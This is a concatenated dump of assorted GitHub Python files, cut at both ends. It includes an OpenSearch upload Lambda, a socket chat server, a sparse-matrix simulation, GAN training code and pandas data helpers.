mcr)\n return profile\n\n\ndef upload_elasticsearch(doc_profile, mcr):\n now = datetime.now()\n doc_profile['updated_datetime'] = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\n secret = get_secret()\n headers = {'Content-Type': 'application/json'}\n data = json.dumps(doc_profile)\n es_endpoint = 'https://search-mohdocs-2iniqjm32dbswnucm6tes3y4sm.ap-southeast-1.es.amazonaws.com/doctors/_doc/' \n document_index = es_endpoint + mcr + '_' + now.strftime('%y%m%d')\n response = requests.put(document_index, \n headers=headers, \n data=data, \n auth=(secret['opensearch_user'], secret['opensearch_pw']))\n return None\n\ndef lambda_handler(event, context):\n mcr = event['mcr']\n doc_profile = get_from_s3(mcr)\n upload_elasticsearch(doc_profile, mcr)\n return {\n 'statusCode': 200,\n 'body': f'Successfully added {mcr} to search engine!'\n }\n\n","repo_name":"mkitho/infoshelf","sub_path":"lambda_parse/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27228079474","text":"\"\"\"\nDefines the Authenticated Decorator which forces the user to be authenticated\nto perform the request.\n\"\"\"\n\nimport functools\n\nfrom bottle import request, redirect\nfrom helpers.config_manager import ConfigManager\n\n\ndef authenticated():\n \"\"\" Defines an authenticated decorator, which verifies that the user is\n logged in.\n\n When a function is associated with this decorator, if the function returns\n a dict this function will append a bool indicating whether or not the user\n is logged in.\n\n Args:\n None, but calls the user management interface to determine if the\n user is logged in.\n Returns:\n The dictionary the contained function returns, with an additional entry\n named 'logged_in' that maps to a boolean that indicates whether or not\n the user is logged in.\n\n If the contained function does not return a dict, then this function\n returns whatever the contained function returns.\n\n This function will also redirect the user to the login page if the user\n is not logged in.\n \"\"\"\n\n def decorator(function):\n\n @functools.wraps(function)\n def wrapper(*args, **kwargs):\n is_user_logged_in = ConfigManager.user_management_interface.is_user_logged_in(\n request)\n if not is_user_logged_in:\n redirect('/login_page')\n\n webpage_arguments = function(*args, **kwargs)\n\n api_key = ConfigManager.user_management_interface.get_api_key_for_user(\n request)\n if isinstance(webpage_arguments, dict):\n webpage_arguments['logged_in'] = is_user_logged_in\n webpage_arguments['api_key'] = api_key\n\n return webpage_arguments\n\n return wrapper\n\n return decorator\n","repo_name":"sumnerevans/wireless-debugging","sub_path":"server/helpers/authenticated.py","file_name":"authenticated.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"72616817174","text":"import socket\nimport threading\n\nHOST = socket.gethostbyname(socket.gethostname())\nPORT = 5566\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((HOST, PORT))\n\nserver.listen()\n\nclients = []\nnicknames = []\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n print(f\"{nicknames[clients.index(client)]} says {message}\")\n if \"who is online?\" in message.decode(\"utf-8\"):\n nicknames_splited = \",\".join(nicknames)\n client.send(f'The clients conntected are: {nicknames_splited}\\n'.encode('utf-8'))\n elif \"send file\" in message.decode(\"utf-8\"):\n path = message.decode(\"utf-8\").split(\"file \")[1]\n path_len = len(path)\n path = path[:path_len - 2] #To remove \"\\n\" at the end of the path\n file = open(path, 'rb')\n data = file.read(1024)\n if data:\n print(\"Sending data\")\n broadcast(data)\n print(\"Data sent successfully\")\n break\n else:\n print(\"failed to send data\")\n break\n \n elif \"to: \" in message.decode(\"utf-8\"):\n text = message.decode(\"utf-8\").split(\"to: \")\n actual_message = text[0].split(\":\")[1].strip()\n receiver_nickname = text[1].strip()\n sender_nickname = text[0].split(\":\")[0].strip()\n receiver_index = nicknames.index(receiver_nickname)\n client.send(f\"{sender_nickname} TO: ({receiver_nickname}) {actual_message}\\n\".encode('utf-8'))\n receiver = clients[receiver_index]\n receiver.send(f\"(PRIVATE) from {sender_nickname}: {actual_message}\\n\".encode('utf-8'))\n else :\n broadcast(message)\n except:\n index = clients.index(client)\n clients.remove(client)\n nickname = nicknames[index]\n broadcast((f\"{nickname} left the conversation :/\\n\").encode('utf-8'))\n client.close()\n nicknames.remove(nickname)\n broadcast(f\"{' '.join(nicknames)} online_users\".encode('utf-8')) #To send the updated list of online users and show it in the list box \n if len(nicknames) == 0:\n print(\"NO ONE IS CONNECTED :/\")\n else:\n print(f'The clients conntected are: {nicknames}')\n break\n\n\ndef receive():\n while True:\n client, address = server.accept()\n print(f\"Connected with {str(address)}!\")\n \n client.send(\"NICK\".encode('utf-8'))\n nickname = client.recv(1024).decode(\"utf-8\")\n \n nicknames.append(nickname)\n clients.append(client)\n \n print(f\"Nickname of the client is {nickname}\")\n broadcast(f\"{nickname} connected to the server!\\n\".encode('utf-8'))\n broadcast(f\"{' '.join(nicknames)} online_users\".encode('utf-8')) #To send the list of online users and show it in the list box \n client.send(\"Connected to the server\".encode('utf-8'))\n thread = threading.Thread(target=handle, args=(client,)) #The comma just to make it as a tuple\n thread.start()\n \n \nprint(\"Server is running ...\")\nprint(\"Please <<<>>> use the following commands to enjoy the features of our mini chatter box:\\n\\n 1-to: (nickname) >>is to send a message privately \\n 2-who is online? >>is so you get the list of online clients on the server\\n 3-send file with the path wanted >>is to send a specific file\\n\")\nreceive()\n\n\n\n\n","repo_name":"daliaawad/Chatapp","sub_path":"Project1/Project-1-ChatProgram-prefinal-touches/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43926432009","text":"def circular_prime(number):\n primes = [True for i in range(0, number + 1)]\n for i in range(2, int(number ** (1 / 2))):\n if primes[i]:\n for j in range(i ** 2, number + 1, i):\n primes[j] = False\n result = []\n for i in range(0, number + 1):\n if primes[i]:\n length = len(str(i))\n for j in range(length):\n if not primes[int(str(i)[-j:] + str(i)[:-j])]:\n break\n else:\n result.append(i)\n return len(result)\n\n\nif __name__ == '__main__':\n print(circular_prime(1000000))\n","repo_name":"Saterton/softheme","sub_path":"circular_prime.py","file_name":"circular_prime.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3216730663","text":"\nimport random\nimport numpy as np\nimport math\nM=1500\nN=128-63\nK=96*3-49\nn=2\nsp_dtype=np.dtype([('row',np.int32),('col',np.int32),('val',np.float)])\nclass DDR:\n mat1=np.empty((M,N),dtype=sp_dtype).tolist()\n mat2=np.empty((N,K),dtype=np.float).tolist()\n ##divided to N/32 blocks, each block size is M*32\n mat1sparse=np.empty((math.ceil(M/1024),math.ceil(N/32)),dtype=sp_dtype).tolist()\n def __init__(self):\n ##init mat1 with sparsity\n for i in range(M):\n for j in range(N):\n self.mat1[i][j]=(i,j,random.randint(0,10)*random.choice([0,0,0,0,0,0,0,1]))\n for i in range(N):\n for j in range(K):\n self.mat2[i][j]=random.randint(1,10)\n for i in range(M):\n for j in range(N):\n if self.mat1[i][j][2]!=0:\n if(isinstance(self.mat1sparse[int(i/1024)][int(j/ 32)],tuple)):\n self.mat1sparse[int(i/1024)][int(j/ 32)]=[self.mat1[i][j]]\n else:\n self.mat1sparse[int(i/1024)][int(j/32)].append(self.mat1[i][j])\n def show_mat1(self):\n for i in range(math.ceil(M/1024)):\n for j in range(math.ceil(N/32)):\n print(\"number of vals in (%d,%d) M*32 mat1 block is %d\"%(i,j,len(self.mat1sparse[i][j])))\n def get_mat1_blocks_by_group(self,group_number,index_of_block_count_by_by_row):\n #mat1sparse layout is (N/32)*(M*32), each time a group of size n*(m*32) ,group_number is 0,1,\n return self.mat1sparse[index_of_block_count_by_by_row][group_number*n:(group_number+1)*n]\n def get_mat2_blocks(self,addr,block_size=32*n,block_bumber=96):\n #each time 96 blocks, each block is 32n,\n row_addr=int(addr/K)\n col_addr=addr-row_addr*K\n return np.array(self.mat2)[row_addr:row_addr+block_size,col_addr:col_addr+block_bumber].tolist()\n\n def get_correct_result(self):\n a=np.zeros((M,N))\n for i in range(M):\n for j in range(N):\n a[i][j]=self.mat1[i][j][2]\n\n b=np.array(self.mat2)\n return np.matmul(a,b).tolist()\n\n\n\n\nclass MatRAM:\n data=[]\n def store_mat1_blocks_by_group(self,spmat_group):\n for i in spmat_group:\n self.data.append(i)\n def get_32_nozero_elements(self,addr,block_index):\n ##MatRAM data layout is (N/32)*(M*32)\n return self.data[block_index][addr:addr+32]\n\n\n def del_mat1_blocks_by_group(self):\n self.data.clear()\n def show_mat1(self):\n print(\"number of M*32 mat1 blocks is %d\" % (len(self.data)))\n for i in self.data:\n print(\"number of vals in this M*32 mat1 block is %d\"%(len(i)))\n\n def get_number_of_vals_in_one_block(self,block_index):\n if(block_index0):\n for i in range(padding_row_size):\n self.data.append([0 for j in range(len(vec_blocks[0]))])\n\n def get_data(self):\n return self.data\n\n def clear_vec_ram(self):\n self.data.clear()\n def show(self):\n print(\"the vec ram size si %d*%d\"%(len(self.data),len(self.data[0])))\nclass VecRegs:\n ### data layout 12*8*(32*n)\n cu_list=[[] for i in range(12)]\n def store_vec_regs(self, vec_blocks):\n vec_blocks=np.array(vec_blocks)\n for i in range(12):\n # vec_blocks layout (32*n)*96\n ## need reshape from (32*n)*8 8*(32*n)\n ## most of the time block_numbers=96\n block_numbers=len(vec_blocks[0])\n self.cu_list[i] = vec_blocks[:, i:i + block_numbers:12].transpose().tolist()\n max_12_in_blocks =0\n for i in range(12):\n if(len(self.cu_list[i])>max_12_in_blocks):\n max_12_in_blocks=len(self.cu_list[i])\n ## number_of_32_in_blocks is 96 except for the last block\n number_of_32_in_blocks=len(vec_blocks)\n\n for i in range(12):\n if(len(self.cu_list[i]) self.max_row_index):\n for j in range(i[0]-self.max_row_index):\n self.CU_src1_dense.append([0 for j in range(32)])\n self.number_of_rows+=1\n self.max_row_index=i[0]\n self.CU_src1_dense[-1][i[1] % 32] = i[2]\n else:\n ##row 1024 to 0\n pass\n def CUs_compute(self,coladdr):\n temp1=np.array(self.CU_src1_dense)\n temp2 = np.array(self.CU_src2)\n for i in range(len(self.CU_src1_dense)):\n for j in range(12):\n ## COMPUTE THE PADDING PART BUT NOT ADD\n if (coladdr+j bool:\n stt = {'a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'} \n \n n = len(s)\n cnt = 0\n for i in range(n//2):\n if s[i] in stt: cnt+=1\n if s[n-1-i] in stt: cnt-=1\n \n if cnt ==0: return True\n return False\n","repo_name":"samek571/leetcode-600","sub_path":"1704. Determine if String Halves Are Alike.py","file_name":"1704. Determine if String Halves Are Alike.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6817704476","text":"import pandas as pd\nfrom models.product_data import BrandData\nfrom shopify_dao.product import ProductDao\nfrom supplier_manager.andersonteak.product_manager import AndersonTeakProductManager\nfrom tests.supplier_manager.assertions import assert_base_data, assert_sku_fetch\n\n\ndef test_convert_anderson_product(product_dao: ProductDao, brand_data: BrandData):\n atpm = AndersonTeakProductManager(\n product_dao,\n brand_data,\n 'datacollections/andersonteak/testproducts.xlsx', \n 'datacollections/andersonteak/testinventory.csv',\n sku_prefix=\"TEST\"\n )\n atpm.upsert_all_anderson_data()\n product_data_list = atpm.fetch_all_product_data_list()\n assert len(product_data_list) > 0\n assert_base_data(product_data_list, product_dao)\n\n\ndef test_fetch_single_row(product_dao: ProductDao, brand_data: BrandData):\n product_path = 'datacollections/andersonteak/testproducts.xlsx'\n xls = pd.ExcelFile(product_path)\n product_df: pd.DataFrame = pd.read_excel(xls, 'Bulkload', header=1).dropna(subset=['Product Name']).reset_index(drop=True)\n sku_prefix = \"TEST\"\n atpm = AndersonTeakProductManager(\n product_dao,\n brand_data,\n product_path, \n 'datacollections/andersonteak/testinventory.csv',\n sku_prefix=sku_prefix\n )\n sku = list(product_df['Manufacturer Model Number'])[0]\n default_id = f\"{sku_prefix}-{sku}\"\n assert_sku_fetch(atpm, default_id)\n\n","repo_name":"todhm/expertodeleste","sub_path":"backend/tests/supplier_manager/test_anderson_teak.py","file_name":"test_anderson_teak.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32194284764","text":"test_dict = {\r\n\r\n}\r\ntest_dict[\"中直机关2018年4季度批量集中采购项目招标公告2018年08月29日 11:29 来源:中国政府采购网 【打印】\"] = \"123\"\r\n\r\n# print(test_dict)\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nres = requests.get(\"http://www.ccgp.gov.cn/cggg/dfgg/xjgg/201903/t20190307_11724686.htm\")\r\nres.encoding = res.apparent_encoding\r\n\r\nsoup = BeautifulSoup(res.text,\"html.parser\")\r\n\r\n\r\n# count = 0\r\n# list = []\r\n\r\n# l = list[1]\r\ntrs = soup.select(\".vF_detail_content\")\r\nfor tr in trs:\r\n print(type(tr.text))\r\n # tds = tr.select(\"td\")\r\n # for td in tds:\r\n # print(td.text)\r\n # print(\"-----------------------\")","repo_name":"KqSMea8/pyhton","sub_path":"tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17997610784","text":"import numpy as np\n\nA2 = np.array([[1, 2, 2],\n [2, 1, 1],\n [1, 2, 1]])\nA3p = np.random.rand(90, 90)\nA3 = A3p*A3p + 0.0000001 * np.eye(90)\nA4 = np.array([[1, 2],\n [2, 8]])\nA5 = np.array([[2020]])\n\ntest_inv1 = [np.eye(2020), np.eye(2020)]\ntest_inv2 = [A2, np.linalg.inv(A2)]\ntest_inv3 = [A3, np.linalg.inv(A3)]\ntest_inv4 = [A4, np.linalg.inv(A4)]\ntest_inv5 = [A5, np.linalg.inv(A5)]\n\nTESTS_INV = [\n test_inv1, test_inv2, test_inv3, test_inv4, test_inv5\n]\n##################################################\ne1 = np.zeros(2020)\ne1[0] = 1\ntest1_gauss = [[np.eye(2020), e1], e1.transpose()]\nvec2 = np.array([[1], [2], [4]])\nA2inv = np.linalg.inv(A2)\ntest2_gauss = [[A2, vec2], A2inv.dot(vec2)]\nvec3 = np.random.rand(90, 1)\nA3inv = np.linalg.inv(A3)\ntest3_gauss = [[A3, vec3], A3inv.dot(vec3)]\nA4inv = np.linalg.inv(A4)\nvec4 = np.array([[3], [9]])\ntest4_gauss = [[A4, vec4], A4inv.dot(vec4)]\ntest5_gauss = [[A5, np.array([[1], [1], [1]])], np.array([[1/2020], [1/2020], [1/2020]])]\n\nTESTS_GAUSS_FORM = [\n test1_gauss, test2_gauss, test3_gauss, test4_gauss, test5_gauss\n]\n#########################################\n\n\ndef StepEuler(t, x, h, func):\n \"\"\" Fonction renvoyant l'approximation l'integrale de f à l'instant t+h\"\"\"\n return x + h * func(t, x)\n\n\ndef MyEuler(t0, x0, T, N, func):\n \"\"\" Fonction renvoyant l'approximation l'integrale de f dans un interval t0 - t0+T \"\"\"\n x = np.zeros(N + 1, dtype='float')\n x[0] = x0 # On définit le x0 initial\n\n h = T / N\n time = np.linspace(t0, t0 + T, N + 1, dtype='float') # On définit les intervalles\n\n # On calcule x(t) pour tout les t grace à StepEuler\n for idx in range(N):\n x[idx + 1] = StepEuler(time[idx], x[idx], h, func)\n\n return time, x\n\n\ndef func1(t, x):\n return np.cosh(x ** 2 * t) + 50 * np.tanh(t / (np.abs(x) + 1))\n\n\ndef func2(t, x):\n return np.exp(x+2*t)\n\n\ndef func3(t, x):\n return x ** t - t ** x\n\n\ndef func4(t, x):\n return t ** 2 - x ** 2\n\n\ndef func5(t, x):\n return np.ceil(t - x) - (t - x)\n\n\ntest_euler1 = [[0, 1, 0.01, 100, func1], MyEuler(0, 1, 0.01, 100, func1)]\ntest_euler2 = [[0.1, 0, 0.1, 10, func2], MyEuler(0.1, 0, 0.1, 10, func2)]\ntest_euler3 = [[1, 3, 0.001, 42, func3], MyEuler(1, 3, 0.001, 42, func3)]\ntest_euler4 = [[0, 0, 0.0001, 2000, func4], MyEuler(0, 0, 0.0001, 2000, func4)]\ntest_euler5 = [[1, 0, 1, 9310023, func5], MyEuler(1, 0, 1, 9310023, func5)]\n\nTESTS_EULER = [test_euler1, test_euler2, test_euler3, test_euler4, test_euler5]\n\n#####################################\n\n\ndef f(t, x):\n return np.sin(t**2)\n\n\ndef progtir(b):\n # Find numerical solution to the equation y''=fy simplified as two odes of order 1.\n # Iterations number and Cauchy conditions are hard coded\n y = np.zeros(1000001, dtype='float') # y[t]\n z = np.zeros(1000001, dtype='float') # y'[t]\n y[0] = 1 # y[0]\n z[0] = b # y'[0]\n h = 5 / 1000000\n time = np.linspace(0, 5, 1000000, dtype='float') # On définit les intervalles\n\n # On calcule y(t),y'(t) pour tout les t utilisons la système formé par y''=fy\n for idx in range(1000000):\n z[idx + 1] = z[idx] + h * f(time[idx], y[idx]) * y[idx]\n y[idx + 1] = y[idx] + h * z[idx]\n\n return y[1000000]\n\n\ndef methtir(eps):\n # A bisection method solution finding a value b for which progtir(b) = 0 on [-1,0] with error eps.\n # Iteration number and initial constants are hard coded.\n left_b = -1\n right_b = 0\n iteration = 0\n curr_val = 0\n\n while iteration < 100000:\n avg = (left_b + right_b) / 2\n curr_val = progtir(avg)\n if (left_b - right_b < eps) or curr_val == 0:\n break\n\n iteration += 1\n if curr_val * progtir(left_b) > 0:\n left_b = avg\n else:\n right_b = avg\n\n return curr_val\n\n\nrandom_epsilons = np.random.rand(1, 15)\nrandom_ints = np.random.randint(-20212021, 20212021, 15)\nTESTS_PROGTIR = [[float(b), float(progtir(b))] for b in random_ints]\nTESTS_METHTIR = [[float(eps), float(methtir(eps))] for eps in random_epsilons[0]]\n","repo_name":"schwartznir/grader_iut","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32213929912","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.dashboard, name=\"dashboard\"),\n path('month_selector/', views.month_selector, name=\"month_selector\"),\n \n path('bank_detail/', views.bank_detail, name=\"bank_detail\"),\n path('bank/create', views.create_bank_account, name=\"create_bank_account\"),\n path('bank/update/', views.update_bank_account, name=\"update_bank_account\"),\n path('bank/remove/', views.remove_bank_ac, name=\"remove_bank_ac\"),\n]\n","repo_name":"miketqqq/Account-Manager","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23698603103","text":"import os\r\nimport argparse\r\nfrom models import *\r\nfrom datasets import *\r\nfrom tools.tools import Timer, AverageMeter, tdict\r\nimport socket\r\nfrom utils import *\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.distributed as dist\r\nimport torch.multiprocessing as mp\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nfrom torchvision.utils import save_image, make_grid\r\nfrom apex import amp\r\nfrom apex.parallel import DistributedDataParallel as DDP\r\n\r\ndef main():\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--n_epochs\", type=int, default=10)\r\n parser.add_argument(\"--dataset_name\", type=str, default=\"img_align_celeba\")\r\n parser.add_argument(\"--batch_size\", type=int, default=4)\r\n parser.add_argument(\"--lr\", type=float, default=0.0002)\r\n parser.add_argument(\"--b1\", type=float, default=0.5)\r\n parser.add_argument(\"--b2\", type=float, default=0.999)\r\n parser.add_argument(\"--n_cpu\", type=int, default=8)\r\n parser.add_argument(\"--hr_height\", type=int, default=256)\r\n parser.add_argument(\"--hr_width\", type=int, default=256)\r\n parser.add_argument(\"--channels\", type=int, default=3)\r\n parser.add_argument(\"--validation_interval\", type=int, default=100)\r\n parser.add_argument(\"--checkpoint_name\", type=str, default='parallel')\r\n\r\n parser.add_argument('-n', '--nodes', default=1, type=int)\r\n parser.add_argument('-g', '--gpus', default=1, type=int)\r\n parser.add_argument('-nr', '--nr', default=0, type=int)\r\n parser.add_argument('--master_addr', default=str(socket.gethostbyname(socket.gethostname())), type=str, help='master ip address')\r\n parser.add_argument('--master_port', default='8888', type=str, help='master port')\r\n args = parser.parse_args()\r\n\r\n args.world_size = args.gpus * args.nodes\r\n os.environ['MASTER_ADDR'] = args.master_addr\r\n os.environ['MASTER_PORT'] = '20000'\r\n print(args)\r\n mp.spawn(train, nprocs=args.gpus, args=(args,))\r\n\r\ndef train(gpu, args):\r\n rank = args.nr * args.gpus + gpu\r\n dist.init_process_group(backend='nccl', init_method='env://', world_size=args.world_size, rank=rank)\r\n torch.manual_seed(0)\r\n\r\n hr_shape = (args.hr_height, args.hr_width)\r\n generator = GeneratorResNet()\r\n discriminator = Discriminator(input_shape=(args.channels, *hr_shape))\r\n feature_extractor = FeatureExtractor()\r\n\r\n torch.cuda.set_device(gpu)\r\n generator.cuda(gpu)\r\n discriminator.cuda(gpu)\r\n feature_extractor.cuda(gpu)\r\n\r\n # loss\r\n criterion_GAN = nn.MSELoss().cuda(gpu)\r\n criterion_content = nn.L1Loss().cuda(gpu)\r\n\r\n # optimizer\r\n optimizer_G = torch.optim.Adam(generator.parameters(), lr=args.lr, betas=(args.b1, args.b2))\r\n optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=args.lr, betas=(args.b1, args.b2))\r\n\r\n # Save model attributes (erased after DDP)\r\n discriminator_output_shape = discriminator.output_shape\r\n\r\n # Wrap the model\r\n generator = nn.parallel.DistributedDataParallel(generator, device_ids=[gpu])\r\n discriminator = nn.parallel.DistributedDataParallel(discriminator, device_ids=[gpu], broadcast_buffers=False)\r\n feature_extractor = nn.parallel.DistributedDataParallel(feature_extractor, device_ids=[gpu])\r\n\r\n # Dataloader\r\n train_dataset = ImageDataset(\"../../data/%s\" % args.dataset_name, hr_shape=hr_shape)\r\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset,\r\n num_replicas=args.world_size,\r\n rank=rank)\r\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\r\n batch_size=args.batch_size,\r\n shuffle=False,\r\n num_workers=0,\r\n pin_memory=True,\r\n sampler=train_sampler)\r\n\r\n torch.autograd.set_detect_anomaly(True)\r\n total_step = len(train_loader)\r\n\r\n if gpu == 0 :\r\n os.makedirs(\"images\", exist_ok=True)\r\n os.makedirs(\"saved_models\", exist_ok=True)\r\n\r\n global_timer = Timer()\r\n epoch_timer = Timer()\r\n iter_timer = Timer()\r\n iter_time_meter = AverageMeter()\r\n\r\n global_timer.start()\r\n\r\n for epoch in range(args.n_epochs):\r\n if gpu == 0:\r\n epoch_timer.start()\r\n for i, imgs in enumerate(train_loader):\r\n if gpu == 0:\r\n iter_timer.start()\r\n imgs_lr = imgs[\"lr\"].cuda(non_blocking=True)\r\n imgs_hr = imgs[\"hr\"].cuda(non_blocking=True)\r\n\r\n valid = torch.ones((imgs_lr.size(0), *discriminator_output_shape), device=gpu)\r\n fake = torch.zeros((imgs_lr.size(0), *discriminator_output_shape), device=gpu)\r\n\r\n gen_hr = generator(imgs_lr)\r\n\r\n loss_GAN = criterion_GAN(discriminator(gen_hr), valid)\r\n\r\n gen_features = feature_extractor(gen_hr)\r\n real_features = feature_extractor(imgs_hr)\r\n loss_content = criterion_content(gen_features, real_features.detach())\r\n\r\n # Total loss\r\n loss_G = loss_content + 1e-3 * loss_GAN\r\n\r\n optimizer_G.zero_grad()\r\n loss_G.backward()\r\n optimizer_G.step()\r\n\r\n loss_real = criterion_GAN(discriminator(imgs_hr), valid)\r\n loss_fake = criterion_GAN(discriminator(gen_hr.detach()), fake)\r\n\r\n loss_D = (loss_real + loss_fake) / 2\r\n\r\n optimizer_D.zero_grad()\r\n loss_D.backward()\r\n optimizer_D.step()\r\n\r\n if gpu == 0:\r\n print(\r\n \"[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f] \"\r\n % (epoch, args.n_epochs, i, len(train_loader), loss_D.item(), loss_G.item()), end=''\r\n )\r\n iter_time_meter.update(iter_timer.stop())\r\n print('time for iteration: %.4f (%.4f)'%(iter_time_meter.val, iter_time_meter.avg))\r\n\r\n if i % args.validation_interval == 0:\r\n imgs_lr = nn.functional.interpolate(imgs_lr, scale_factor=4)\r\n imgs_hr_raw = imgs['hr_raw'].cuda(non_blocking=True)\r\n with torch.no_grad():\r\n print('[psnr] (imgs_lr):%.4f, (gen_hr):%.4f'%(psnr(minmaxscaler(imgs_lr), imgs_hr_raw, max_val=1).mean().item(), psnr(minmaxscaler(gen_hr), imgs_hr_raw, max_val=1).mean().item()))\r\n\r\n imgs_hr_raw = make_grid(imgs_hr_raw, nrow=1, normalize=True)\r\n gen_hr = make_grid(gen_hr, nrow=1, normalize=True)\r\n imgs_lr = make_grid(imgs_lr, nrow=1, normalize=True)\r\n img_grid = torch.cat((imgs_hr_raw, imgs_lr, gen_hr), -1)\r\n save_image(img_grid, \"images/%d.png\" % i, normalize=False)\r\n if gpu==0:\r\n print('Elapsed_time for epoch(%s): %s'%(epoch, epoch_timer.stop()))\r\n if gpu == 0:\r\n print(\"Training complete in: %s \"%global_timer.stop())\r\n print('Average time per iteration: %s'%str(iter_time_meter.avg))\r\n torch.save(generator.state_dict(), \"saved_models/generator_%s.pth\" % args.checkpoint_name)\r\n torch.save(discriminator.state_dict(), \"saved_models/discriminator_%s.pth\" % args.checkpoint_name)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n'''\r\n PSNR SSIM\r\n generator 23.4061 0.7882\r\n low res 26.2965 0.7801\r\n\r\ntimer per iteration: 1.2152\r\n'''\r\n","repo_name":"jsyoo61/MultiGPU-SRGAN","sub_path":"srgan_distributed.py","file_name":"srgan_distributed.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"33237291918","text":"import os\n\nwith open('dbgAc97.h', 'r') as f:\n\tac97File = f.read()\nwith open('dbgLog.h', 'r') as f:\n\tdbgLog = f.read()\nwith open('..\\common.h') as f:\n\tcommon = f.read();\n\t\npath = os.path.abspath(os.getcwd()+'/../../bin/dbgLog.bin')\n\ndbgLog = dbgLog.replace('%LOGFILE%', path.replace('\\\\', '\\\\\\\\'))\ndbgLog = dbgLog.replace('#include \"../common.h\"', common)\nac97File = ac97File.replace('#include \"dbgLog.h\"', dbgLog)\n\nwith open('../../bin/dbgAc97.h', 'w') as f:\n\tf.write(ac97File)\n","repo_name":"TheDeadFish/dbgLog","sub_path":"src/vbxlog/build_ac97.py","file_name":"build_ac97.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35030959709","text":"import pandas as pd\nimport numpy as np\nfrom scipy import sparse\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nimport tensorflow as tf\nfrom datetime import datetime\n\ndef restore_from_scope(scope):\n print(\"building saver to restore {0}\".format(scope))\n restore_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=scope)\n saver = tf.train.Saver(restore_vars)\n return saver\n\ndef get_init_opt(sess):\n print(\"getting uninitialized variables\")\n uninit_vars = []\n for var in tf.all_variables():\n try:\n sess.run(var)\n except tf.errors.FailedPreconditionError:\n uninit_vars.append(var)\n return tf.variables_initializer(uninit_vars)\n\ndef normalize_data(feats):\n \"\"\"\n input:\n feats: np array, obs*feats\n output:\n np array\n \"\"\"\n return (feats - feats.mean(axis=0)) / feats.std(axis=0)\n \ndef get_unique_random_idx(in_a, size, remove=True):\n if isinstance(in_a, int):\n a = np.arange(in_a)\n else:\n a = in_a\n if not isinstance(in_a, np.ndarray):\n raise ValueError(\"in_a should be either int or a numpy array\")\n\n if len(a) <= size:\n if remove:\n return a, None\n else:\n return a\n else:\n idx = np.random.choice(a, size, replace=False)\n if remove:\n a_set = set(list(a))\n idx_set = set(list(idx))\n out_a = np.asarray(list(a_set-idx_set), dtype=np.int64)\n return idx, out_a\n else:\n return idx\n\ndef delete_rows_mask(high, indices):\n if high < len(indices):\n raise ValueError(\"high must larger than num of indices\")\n else:\n mask = np.ones(high, dtype=bool)\n mask[indices] = False\n return mask\n\ndef get_raw_data(path=None, nrows=None):\n \"\"\"\n input:\n path: path to raw data\n nrows: number of lines want to load, None means all\n output:\n data: dataframe without the feature names\n feature2idx: a dict from feature to idx\n \"\"\"\n data = pd.read_csv(filepath_or_buffer=path,\n sep='\\s',\n nrows=nrows,\n header=None)\n feat2idx = {data.loc[0][i]:i for i in range(data.shape[1])}\n data = data.drop(0, axis=0)\n \n data[data.isnull()] = '-1'\n \n return data, feat2idx\n\n\ndef get_int_histograms(data=None, col=None, is_int=False, do_plot=False):\n \"\"\"\n input:\n data: pandas dataframe, to be processed\n col: int, column to be counted\n is_numerical: bool, if the col data is numerical or not\n is_int: bool, if the col data is double\n acc: int, set the accuracy of double data\n do_plot: bool\n output:\n a dict of feature vs counts\n bad data rate\n \"\"\"\n bad_rate = 0.\n \n m, n = data.shape\n \n data[[n-1]] = data[[n-1]].apply(pd.to_numeric)\n if is_int:\n positive = 1\n bad_data = -1\n data[[col]] = data[[col]].apply(pd.to_numeric)\n else:\n positive = '1'\n bad_data = '-1'\n \n id_set = pd.Series.unique(data.loc[:][col]) \n \n if is_int:\n sorted(id_set)\n\n count_list = []\n \n for item in id_set:\n tmp_data = data.loc[data[col] == item]\n try:\n count_list.append(tmp_data[[n-1]].apply(pd.value_counts).loc[positive].values[0] / 